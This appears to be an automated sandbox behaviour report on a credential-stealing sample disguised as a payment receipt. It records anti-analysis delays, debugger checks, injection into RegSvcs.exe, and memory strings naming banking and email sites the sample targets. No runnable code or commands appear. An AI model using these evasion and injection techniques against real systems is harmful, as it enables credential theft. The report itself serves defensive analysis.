Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

API/Special instruction interceptor: Address: A1CB0C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598780	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598108	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597999	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597433	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596450	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595686	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594593	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 2160			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 7690			Jump to behavior

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Evaded block: after key decision			graph_1-95774
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Evaded block: after key decision			graph_1-94539

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_1-95192

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

API coverage: 4.6 %

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FF6CA9 GetFileAttributesW,FindFirstFileW,FindClose,	1_2_00FF6CA9
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FF60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	1_2_00FF60DD
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FF63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	1_2_00FF63F9
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FFEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_00FFEB60
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FFF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	1_2_00FFF5FA
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FFF56F FindFirstFileW,FindClose,	1_2_00FFF56F
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_01001B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_01001B2F
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_01001C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_01001C8A
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_01001F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_01001F94

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Code function: 1_2_00FCDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

1_2_00FCDDC0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598780	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598108	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597999	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597433	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596450	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595686	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594593	Jump to behavior

Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: RegSvcs.exe, 00000007.00000002.3732329936.0000000001191000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: RegSvcs.exe, 00000007.00000002.3735021208.00000000040EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

API call chain: ExitProcess graph end node

graph_1-94662

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 7_2_067C9548 LdrInitializeThunk,

7_2_067C9548

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Code function: 1_2_01006AAF BlockInput,

1_2_01006AAF

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Code function: 1_2_00FB3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

1_2_00FB3D19

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Code function: 1_2_00FE3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,

1_2_00FE3920

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Code function: 1_2_00FCE01E LoadLibraryA,GetProcAddress,

1_2_00FCE01E

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00A1B768 mov eax, dword ptr fs:[00000030h]	1_2_00A1B768
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00A1CDD8 mov eax, dword ptr fs:[00000030h]	1_2_00A1CDD8
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00A1CD78 mov eax, dword ptr fs:[00000030h]	1_2_00A1CD78

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Code function: 1_2_00FEA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

1_2_00FEA66C

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FD81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,		1_2_00FD81AC
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FD8189 SetUnhandledExceptionFilter,		1_2_00FD8189

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: C3B008

Jump to behavior

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Code function: 1_2_00FEB106 LogonUserW,

1_2_00FEB106

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Code function: 1_2_00FB3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

1_2_00FB3D19

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Code function: 1_2_00FF411C SendInput,keybd_event,

1_2_00FF411C

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Code function: 1_2_00FF74E7 mouse_event,

1_2_00FF74E7

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\z30ProofofPaymentAttached.exe"

Jump to behavior

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

1_2_00FEA66C

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Code function: 1_2_00FF71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

1_2_00FF71FA

Source: z30ProofofPaymentAttached.exe	Binary or memory string: Shell_TrayWnd
Source: z30ProofofPaymentAttached.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Code function: 1_2_00FD65C4 cpuid

1_2_00FD65C4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
